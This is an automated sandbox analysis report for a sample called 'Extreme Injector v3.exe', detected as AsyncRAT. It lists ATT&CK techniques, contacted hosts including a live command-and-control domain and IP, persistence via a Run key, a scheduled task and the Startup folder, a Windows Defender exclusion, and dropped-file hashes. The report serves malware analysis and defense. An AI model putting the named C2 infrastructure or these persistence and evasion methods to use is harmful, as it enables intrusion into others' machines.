                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation                      		1
                      Scheduled Task/Job                      		12
                      Process Injection                      		11
                      Masquerading                      		OS Credential Dumping541
                      Security Software Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		21
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		1
                      DLL Side-Loading                      		21
                      Registry Run Keys / Startup Folder                      		151
                      Virtualization/Sandbox Evasion                      		Security Account Manager151
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading                      		12
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      System Network Configuration Discovery                      		SSHKeylogging12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSync23
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582591 Sample: Extreme Injector v3.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 40 or-officials.gl.at.ply.gg 2->40 42 ip-api.com 2->42 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 25 other signatures 2->54 8 Extreme Injector v3.exe 15 5 2->8         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 44 or-officials.gl.at.ply.gg 147.185.221.24, 43985, 49823, 49920 SALSGIVERUS United States 8->44 46 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->46 38 C:\Users\user\AppData\Roaming\svchost.exe, PE32 8->38 dropped 58 Protects its processes via BreakOnTermination flag 8->58 60 Adds a directory exclusion to Windows Defender 8->60 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 22 8->24         started        26 2 other processes 8->26 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 56 Loading BitLocker PowerShell Module 19->56 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Extreme Injector v3.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                      Extreme Injector v3.exe100%AviraHEUR/AGEN.1305769
                      Extreme Injector v3.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\svchost.exe100%AviraHEUR/AGEN.1305769
                      C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\svchost.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://schemas.microsoft.co0%Avira URL Cloudsafe
                      http://osoft.com/pki/ceooCerAut_2010-060%Avira URL Cloudsafe
                      http://www.micom/pki/certs/Miut_2010-06-23.cr0%Avira URL Cloudsafe
                      or-officials.gl.at.ply.gg100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      or-officials.gl.at.ply.gg
                      		147.185.221.24
                      		truetrue
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          or-officials.gl.at.ply.ggtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1746315456.000001B2B0E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1854477434.0000012E72044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2014105281.000001C0EC554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.mpowershell.exe, 00000004.00000002.1876687071.0000012E7A878000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://crl.micropowershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1722348335.000001B2A1019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E621F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1722348335.000001B2A1019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E621F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1746315456.000001B2B0E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1854477434.0000012E72044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2014105281.000001C0EC554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.micro/pki/crl/productCerAut_2010-06-2powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.microsoft.copowershell.exe, 0000000B.00000002.2293488165.000001655A8B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ip-api.comExtreme Injector v3.exe, 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002639000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://osoft.com/pki/ceooCerAut_2010-06powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.1722348335.000001B2A0DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E61FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165424D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameExtreme Injector v3.exe, 00000000.00000002.2923795440.0000000002639000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1722348335.000001B2A0DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E61FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165424D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.micom/pki/certs/Miut_2010-06-23.crpowershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.microsoft.copowershell.exe, 00000004.00000002.1876479990.0000012E7A812000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.microspowershell.exe, 00000001.00000002.1751532684.000001B2B9310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                208.95.112.1
                                                                		ip-api.comUnited States
                                                                		53334TUT-ASUSfalse
                                                                147.185.221.24
                                                                		or-officials.gl.at.ply.ggUnited States
                                                                		12087SALSGIVERUStrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1582591
                                                                Start date and time:2024-12-31 00:47:06 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 16s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:20
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Extreme Injector v3.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@20/20@2/2
                                                                EGA Information:
                                                                • Successful, ratio: 12.5%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 79
                                                                • Number of non-executed functions: 7
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 20.109.210.53, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 3444 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7520 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7784 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
                                                                • Execution Graph export aborted for target svchost.exe, PID 7608 because it is empty
                                                                • Execution Graph export aborted for target svchost.exe, PID 7852 because it is empty
                                                                • Execution Graph export aborted for target svchost.exe, PID 7932 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: Extreme Injector v3.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                18:48:00API Interceptor45x Sleep call for process: powershell.exe modified
                                                                18:49:09API Interceptor96x Sleep call for process: Extreme Injector v3.exe modified
                                                                23:49:03Task SchedulerRun new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
                                                                23:49:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                23:49:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                23:49:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                208.95.112.1VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                • ip-api.com/json/?fields=61439
                                                                SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                • ip-api.com/json/
                                                                SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                • ip-api.com/json/?fields=61439
                                                                987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                • ip-api.com/json/
                                                                Client-built.exeGet hashmaliciousQuasarBrowse
                                                                • ip-api.com/json/
                                                                DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                • ip-api.com/json/?fields=225545
                                                                main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                • ip-api.com/json/8.46.123.189?fields=192511
                                                                main.exeGet hashmaliciousUnknownBrowse
                                                                • ip-api.com/json/8.46.123.189?fields=192511
                                                                HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                • ip-api.com/json/?fields=225545
                                                                147.185.221.24test.exeGet hashmaliciousDarkCometBrowse
                                                                  L363rVr7oL.exeGet hashmaliciousNjratBrowse
                                                                    horrify's Modx Menu v1.exeGet hashmaliciousXWormBrowse
                                                                      fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                        8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                          KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                            PjGz899RZV.exeGet hashmaliciousXWormBrowse
                                                                              ehxF3rusxJ.exeGet hashmaliciousXWormBrowse
                                                                                Client-built-Playit.exeGet hashmaliciousQuasarBrowse
                                                                                  file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    ip-api.comVegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                    • 208.95.112.1
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                    • 208.95.112.1
                                                                                    Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                    • 208.95.112.1
                                                                                    main.exeGet hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.1
                                                                                    HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                    • 208.95.112.1

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TUT-ASUSVegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                    • 208.95.112.1
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                    • 208.95.112.1
                                                                                    http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                    • 162.252.214.4
                                                                                    Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                    • 208.95.112.1
                                                                                    main.exeGet hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.1
                                                                                    SALSGIVERUSOneDrive.exeGet hashmaliciousQuasarBrowse
                                                                                    • 147.185.221.22
                                                                                    gReXLT7XjR.exeGet hashmaliciousNjratBrowse
                                                                                    • 147.185.221.18
                                                                                    _____.exeGet hashmaliciousDarkCometBrowse
                                                                                    • 147.185.221.23
                                                                                    test.exeGet hashmaliciousDarkCometBrowse
                                                                                    • 147.185.221.24
                                                                                    L363rVr7oL.exeGet hashmaliciousNjratBrowse
                                                                                    • 147.185.221.24
                                                                                    WO.exeGet hashmaliciousMetasploitBrowse
                                                                                    • 147.185.221.23
                                                                                    reddit.exeGet hashmaliciousMetasploitBrowse
                                                                                    • 147.185.221.23
                                                                                    loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 147.176.119.110
                                                                                    horrify's Modx Menu v1.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.24
                                                                                    fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.24

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):654
                                                                                    Entropy (8bit):5.380476433908377
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ydb2iq4.vzg.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ld0juyv.nhw.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1urgq5kw.2ee.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4iyaj5kt.0gt.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hivhbrd.ykv.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apexu05t.db5.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
